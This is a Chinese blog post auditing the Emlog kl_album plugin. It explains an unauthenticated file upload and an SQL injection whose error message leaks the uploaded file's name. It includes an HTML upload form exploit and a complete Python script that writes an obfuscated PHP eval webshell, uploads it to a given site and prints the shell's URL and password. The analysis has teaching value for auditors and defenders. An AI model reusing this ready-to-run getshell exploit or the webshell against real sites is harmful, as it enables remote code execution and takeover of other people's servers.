Emlog漏洞————Emlog相册插件前台SQL注入+Getshell

最新推荐文章于 2022-11-12 15:40:49 发布
最新推荐文章于 2022-11-12 15:40:49 发布
阅读量2.5k 收藏
点赞数
分类专栏: 【代码审计】 # 代码审计实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80582751
版权

Emlog简介

Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。

此次引起漏洞的是Emlog的相册插件。

 

漏洞分析

首先安装Emlog的相册的插件

安装之后可以在目录:emlog\src\content\plugins\kl_album下找到所有的安装文件:

之后我们分析Kl-album_ajax_do.php文件

<?php
/**
 * kl_album_ajax_do.php
 * design by KLLER
 */
require_once('../../../init.php');
$DB = MySql::getInstance();
$kl_album_config = unserialize(Option::get('kl_album_config'));
if(isset($_POST['album']) && isset($_FILES['Filedata'])){
	if(function_exists('ini_get')){
		$kl_album_memory_limit = ini_get('memory_limit');
		$kl_album_memory_limit = substr($kl_album_memory_limit, 0, strlen($kl_album_memory_limit)-1);
		$kl_album_memory_limit = ($kl_album_memory_limit+20).'M';

		ini_set('memory_limit', $kl_album_memory_limit);
	}
	define('KL_UPLOADFILE_MAXSIZE', kl_album_get_upload_max_filesize());
	define('KL_UPLOADFILE_PATH', '../../../content/plugins/kl_album/upload/');
	define('KL_IMG_ATT_MAX_W',	100);//图片附件缩略图最大宽
	define('KL_IMG_ATT_MAX_H',	100);//图片附件缩略图最大高
	$att_type = array('jpg', 'jpeg', 'png', 'gif');//允许上传的文件类型
	$album = isset($_POST['album']) ? intval($_POST['album']) : '';
	if($_FILES['Filedata']['error'] != 4){
		$upfname = kl_album_upload_file($_FILES['Filedata']['name'], $_FILES['Filedata']['error'], $_FILES['Filedata']['tmp_name'], $_FILES['Filedata']['size'], $_FILES['Filedata']['type'], $att_type);
		$photo_size = chImageSize(EMLOG_ROOT.substr($upfname, 2), KL_IMG_ATT_MAX_W, KL_IMG_ATT_MAX_H);
		$result = $DB->query("INSERT INTO ".DB_PREFIX."kl_album(truename, filename, description, album, addtime, w, h) VALUES('{$_FILES['Filedata']['name']}', '{$upfname}', '".date('Y-m-d', time())."', {$album}, ".time().", {$photo_size['w']}, {$photo_size['h']})");
		if($result){
			$new_id = $DB->insert_id();
			$the_option_value = Option::get('kl_album_'.$album);
			if($the_option_value !== null){
				$the_option_value = trim($new_id.','.$the_option_value, ',');
				Option::updateOption('kl_album_'.$album, $the_option_value);
				$CACHE->updateCache('options');
			}
		}
	}
	exit;
}
if(ROLE != 'admin') exit('access deined!');
if(isset($_GET['action']) && $_GET['action']!='')

根据上面的代码,我们可以看到验证身份的代码在上传文件的后面,所以任意用户可以实现文件上传,那么之后我们再看看上传部分看看到底是如何进行验证或者对文件进行过滤的,这里面定义了一个$att_type = array('jpg', 'jpeg', 'png', 'gif');,并且将$att_type 这个变量和$_FILE一起传入了kl_album_upload_file函数

unction kl_album_upload_file($filename, $errorNum, $tmpfile, $filesize, $filetype, $type, $isIcon = 0){
	$kl_album_config = unserialize(Option::get('kl_album_config'));
	$extension  = strtolower(substr(strrchr($filename, "."),1));
	$uppath = KL_UPLOADFILE_PATH . date("Ym") . "/";
	$fname = md5($filename) . date("YmdHis") . rand() .'.'. $extension;
	$attachpath = $uppath . $fname;
	if(!is_dir(KL_UPLOADFILE_PATH)){
		umask(0);
		$ret = @mkdir(KL_UPLOADFILE_PATH, 0777);
		if($ret === false) return '创建文件上传目录失败';
	}
	if(!is_dir($uppath)){
		umask(0);
		$ret = @mkdir($uppath, 0777);
		if($ret === false) return "上传失败。文件上传目录(content/plugins/kl_album/upload)不可写";
	}
	doAction('kl_album_upload', $tmpfile);
	//缩略
	$imtype = array('jpg','png','jpeg','gif');
	$thum = $uppath."thum-". $fname;
	$attach = in_array($extension, $imtype) && function_exists("ImageCreate") && kl_album_resize_image($tmpfile,$filetype,$thum,$isIcon,KL_IMG_ATT_MAX_W,KL_IMG_ATT_MAX_H) ? $thum : $attachpath;
	$kl_album_compression_length = isset($kl_album_config['compression_length']) ? intval($kl_album_config['compression_length']) : 1024;
	$kl_album_compression_width = isset($kl_album_config['compression_width']) ? intval($kl_album_config['compression_width']) : 768;
	if($kl_album_compression_length == 0 || $kl_album_compression_width == 0){
		if(@is_uploaded_file($tmpfile)){
			if(@!move_uploaded_file($tmpfile ,$attachpath)){
				@unlink($tmpfile);
				return "上传失败。文件上传目录(content/plugins/kl_album/upload)不可写";
			}else{
				echo 'kl_album_successed';
			}
			chmod($attachpath, 0777);
		}
	}else{
		if(in_array($extension, $imtype) && function_exists("ImageCreate") && kl_album_resize_image($tmpfile,$filetype,$attachpath,$isIcon,$kl_album_compression_length,$kl_album_compression_width)){
			echo 'kl_album_successed';
		}else{
			if(@is_uploaded_file($tmpfile)){
				if(@!move_uploaded_file($tmpfile ,$attachpath)){
					@unlink($tmpfile);
					return "上传失败。文件上传目录(content/plugins/kl_album/upload)不可写";
				}else{
					echo 'kl_album_successed';
				}
				chmod($attachpath, 0777);
			}
		}
	}
	$attach = substr($attach, 6, strlen($attach));
	return 	$attach;
}

从上面的代码中我们发现,对于之前传入的$_type这个变量在这个函数里根本就没有起到任何左右,函数中定义的$imtype = array('jpg','png','jpeg','gif');,也不是用来验证后缀的,而是判断是否需要生成缩略图的,所以重点就是下面的内容了:

$extension  = strtolower(substr(strrchr($filename, "."),1));
$uppath = KL_UPLOADFILE_PATH . date("Ym") . "/";
$fname = md5($filename) . date("YmdHis") . rand() .'.'. $extension;
$attachpath = $uppath . $fname;
...
...
...
if(@!move_uploaded_file($tmpfile ,$attachpath)){

这里我们可以发现上传的文件名是:

$fname = md5($filename) . date("YmdHis") . rand() .'.'. $extension;

这里的意思是将原来的文件名的md5值+当前时间+rand随机数+后缀,md5值和时间基本上比较好确定,但是这个rand()随机数一般都是0-65535之间,非常麻烦。

同时我们可以看到下面的代码,并没有把问卷名输出的地方,只是echo 'kl_album_successed';。难道,我们需要暴力破解shell名字?

我们返回kl_album_ajax_do.php,可以发现上传的if语句中有如下代码:

$result = $DB->query("INSERT INTO ".DB_PREFIX."kl_album(truename, filename, description, album, addtime, w, h) VALUES('{$_FILES['Filedata']['name']}', '{$upfname}', '".date('Y-m-d', time())."', {$album}, ".time().", {$photo_size['w']}, {$photo_size['h']})");

这里将$_FILES['Filedata']['name']直接插入数据库。这里另造成了一个SQL注入漏洞,当然既然有之前的getshell,这里的注入就有点当陪衬了。不过emlog在遇到SQL语句出错的情况下是会报错的。
所以所以,这里我们正好用到这个特性,通过报错可以将$upfname这个字段爆出来,这也就是我们上传成功的shell名字。
如何报错?上传文件名里加个单引号即可。

所以,我来一份利用代码:

<form id="exp" method="post" enctype="multipart/form-data">
<p>target url > <input id="url" type="text" style="width: 300px"></p>
<p>shell file > <input type="file" name="Filedata"></p>
<input name="album" type="hidden" value="111111" >
<p><input type="submit" value="GO!" onclick="exp.action=url.value+'/content/plugins/kl_album/kl_album_ajax_do.php';"></p>
</form>

保存为html,本地打开:

 

 

填入目标url,并选择要上传的shell。(如图,我这里是info'.php,会令SQL出错)。点击GO!

之后可以发现出错了,可以发现文件名已经爆出来了:../content/plugins/kl_album/upload/201411/38493d4468377f721357e9c64f93637d2014111211381611097.php
访问可见shell:

 

这里给出独自等待的一份payload:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2015/4/30
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import sys, os, re, time
 
try:
    import requests
except ImportError:
    raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')
def usage():

    # os.system(['clear', 'cls'][os.name == 'nt'])
    print '+' + '-' * 60 + '+'
    print '\t Python emlog相册插件getshell exploit'
    print '\t   Blog:http://www.waitalone.cn/'
    print '\t\t Code BY: 独自等待'
    print '\t\t Time:2015-04-30'
    print '+' + '-' * 60 + '+'
    if len(sys.argv) != 2:
        print '用法: ' + os.path.basename(sys.argv[0]) + ' EMLOG 网站地址'
        print '实例: ' + os.path.basename(sys.argv[0]) + ' http://www.waitalone.cn/'
        sys.exit()
def getshell(url):
    '''
    emlog相册插件上传getshell函数
    :param url:  emlog url地址
    :return:     返回得到的shell地址
    '''
    up_url = url + 'content/plugins/kl_album/kl_album_ajax_do.php'
    shell = "<?php @preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'($_POST[\"hstsec\"])','a');?>"
    filename = "oneok'.php"
    with open(filename, 'wb') as shellok:
        shellok.write(shell)
    files = {
        'Filedata': (filename, open(filename, 'rb'), 'text/json'),
        'album': (None, 'waitalone.cn')
    }
    try:
        up_res = requests.post(up_url, files=files).content
        shellok = re.findall(re.compile(r'(?<=\.\./).+?(?=\',)'), up_res)
    except Exception, msg:
        print '\n[x] 发生错误了,卧槽!!!:', msg
    else:
        if shellok: return url + shellok[0]
if __name__ == '__main__':
    usage()
    start = time.time()
    url = sys.argv[1]
    if url[-1] != '/': url += '/'
    ok = getshell(url)
    try:
        os.remove('oneok\'.php')
    except Exception:
        print '\n[x] 删除临时文件失败,请手工删除!'
    if ok:
        print '\n[!] 爷,人品暴发了,成功得到Shell:\n\n%s 密码:%s' % (ok, 'hstsec')
    else:
        print '\n[x] 报告大爷,本站不存在此漏洞!'
    print '\n报告爷,脚本执行完毕,用时:', time.time() - start, '秒!'

 

参考:独自等待

 

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Emlog漏洞 | EMLOG博客系统存在暴力破解漏洞
DYBOY-程序开发&网络安全
11-03 7128
漏洞简介: Emlog博客系统默认后台登陆地址为http://域名/admin/login.php 而后台登陆时,错误情况下,验证码未刷新,导致可暴力破解登陆管理员账号 低危漏洞,但是在emlog5.3.1和6.0测试版本均存在   漏洞成因:   同时,其6.0测试版本也未修复。   漏洞验证/演示: 下载官方的emlog5.3.1版本 http://www.emlog.n
EMLOG漏洞 | 敏感信息泄漏phpinfo-代码审计
DYBOY-程序开发&网络安全
12-24 5269
Emlog是一款个人博客系统,使用的人还是非常多的,小巧方便,对于个人站长来说是一个建站的不错选择。今天要公布一个危害轻微的漏洞:phpinfo暴露敏感信息   其实这个漏洞也不算什么吧,以后视情况(得到官方授权后)公布一些高危的漏洞,也欢迎大家持续关注DYBOY的博客。   闲话不多说,首先看看漏洞出现的位置: phpinfo暴露敏感信息 如上图,我们只要构造
Emlog漏洞————Emlog数据库备份与导入功能导致后台getshell
Fly_鹏程万里
06-05 2274
Emlog简介   Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 漏洞分...
Emlog 博客系统后台无视验证码暴力破解
Fly_鹏程万里
03-11 2635
影响版本:Emlog&lt;=5.3.1   漏洞演示环境的搭建: 使用PHPstudy在本地搭建PHP+MYSQL+Apache环境:   注:如果在本地安装了IIS服务,会使得端口冲突,此时我们要进行修改端口(建议可以修改Apache的端口为8080,之后重启服务即可) emlog的安装: 我们从网上下载到emlog的源代码,我们下载下来,并且解压到我们安装的PHPstudy的...
Emlog漏洞————敏感信息泄露
Fly_鹏程万里
06-05 2684
Emlog简介 Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 漏洞分析 ...
EMLOG插件——使文章发布时间与当前时间同步
11-17
本知识点将深入探讨如何使用"EMLOG插件——使文章发布时间与当前时间同步"这一功能,以便帮助EMLOG用户更好地管理和展示他们的博客内容。 在EMLOG中,文章的发布时间通常是在创建或编辑文章时设定的,它反映了文章...
emlog注册插件 使用邀请码注册用户优化emlog插件下载
04-30
emlog注册插件 使用邀请码注册用户优化emlog插件下载 使用说明: 自行设置邀请码长度和数量添加 自动生成的邀请码有去重功能,不推荐手动添加 非常不推荐但要想手动添加可以将自动添加数量设为0,然后自己按照格式...
Emlog用户注册插件_emlog注册插件_emlog_
09-30
总之,"Emlog用户注册插件"是提升Emlog博客系统用户体验的关键组件,它扩展了系统的功能,使得更多的人可以参与到博客的互动中来。对于站长来说,合理配置和优化这个插件,不仅可以吸引更多的用户,还能有效保障网站...
Emlog点赞分享打赏插件.zip
最新发布
06-23
Emlog点赞分享打赏插件是一款专为Emlog博客系统设计的增强型插件,它在原有的Emlog功能基础上,提供了额外的互动性组件,包括点赞、分享和打赏功能,旨在提升用户与博客内容之间的互动体验,进一步促进博客的活跃度...
EMLOG付费阅读插件
05-26
内附emlog5.3内容付费插件v1.2版本自行选择 更新内容: 1、优化后台支付appid申请地址的提示,增加XorPay的官网连接地址 2、优化移动端支付弹出框屏幕不适配,提示信息不全的问题。 3、优化部分提示信息。 安装方法...
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞1
emlog_v5.3.1最新版本,最好的最轻便的php个人博客程序
06-08
emlog_v5.3.1最新版本,最好的最轻便的个人博客程序
Emlog漏洞——————Emlog友情链接自助插件存在SQL注入漏洞
Fly_鹏程万里
06-07 1937
Emlog简介 Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 漏洞简介 ...
[PHP代码审计]emblog6.0.0存在SQL注入漏洞
Y4tacker的博客
06-08 888
文章目录写在前面漏洞利用 写在前面 上个水课,发现cnvd上面有个新的emblog的洞,这里简单复现分析下,算是个简单的适合新手学习的洞了 漏洞利用 漏洞点在后台添加自定义导航处 对应代码在admin/navbar.php下第77行,能看见在这里接受POST传入的pages参数,遍历调用addNavi if ($action== 'add_page') { $pages = isset($_POST['pages']) ? $_POST['pages'] : array(); if (e
Emlog很少知道的两处漏洞
白昼小丑的博客
11-12 885
最终的cookie是由$user_login 、 $expiration $hash拼接而成,而$expiration是cookie的生存时间,$user_login是用户名。这里可以得知$key、$user_login、$expiration都是固定的那么只要知道AUTH_KEY就有伪造cookie造成越权的可能。我们将两个靶机的cookie拿出来比较确实是一样的。这里可以看到,调用了emHash这个类方法,并且这里使用了AUTH_KEY这个常量,这里说明这两个常量是有联系的。祝愿Emlog越来越好。
emlog Pro 1.8.0漏洞挖掘之存储型XSS漏洞
白昼小丑的博客
11-08 701
漏洞危害:攻击利用难度大,且危害后果未实现权限跨越(如:取得数据库或服务器主机权限)!测试版本: 官网下载的最新版本:emlog Pro 1.8.0。漏洞修复:关闭用户注册,文章标签处进行代码过滤。成功进行了弹窗,现在进管理账号看一下。写文章 标签处插入xss测试代码。成功利用管理身份触发xss漏洞。利用条件: 需要开启用户注册。而且会自动保存到标签里。
emlog个人博客系统后台存在权限提升漏洞
小易的博客
04-01 1906
影响版本 emlog 前提条件:需要登录后台 漏洞利用 登录后台之后访问 admin/?action=phpinfo 页面,获取网站物理路径 在数据库备份页面先备份数据库,导出到本地电脑。 然后编辑导出的 .sql格式的数据库备份文件。 在最后一行添加如下代码。 将修改后的sql文件,通过后台导入本地备份功能,
代码审计emlog后台getshell
qq_42307546的博客
05-26 244
用的是较为古老的版本v1.0,这里只是作为一个代码审计的练习 项目地址 https://www.jb51.net/codes/105832.html 这里的漏洞点在 \content\plugins\ttjtg_banquan\ttjtg_banquan_setting.php,48-73行 <?php } function plugin_setting() { $fz_kaiguan = isset($_POST['fz_kaiguan']) ? trim($_POST['fz_kaiguan'
Emlog修复后台编辑器存储型XSS漏洞的方法
DYBOY-程序开发&网络安全
03-03 1081
以前DYBOY就发布过关于Emlog6.0的代码审计文章,其中就有分析道emlog文章编辑器的XSS漏洞,如果有些含有会员系统的EMLOG网站,就可能会遭到此漏洞攻击,严重可导致盗取管理员cookie,最后网站被黑客入侵拿下webshell。 当然,我这里不会教大家如何去入侵,而是讲一讲如何防御EMLOG的编辑器XSS攻击。关于XSS漏洞的原理,暂时也不讲了,感兴趣的可以去我的博客:DYBO...
emlog CMS的代码审计_越权到后台getshell - 先知社区1
08-03
前言代码审计安装漏洞漏洞文件: install.php首先我们直奔第一个点能否任意重装,我们可以看到必须常量 DEL_INSTALLER 为 1 的时候才会触发

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值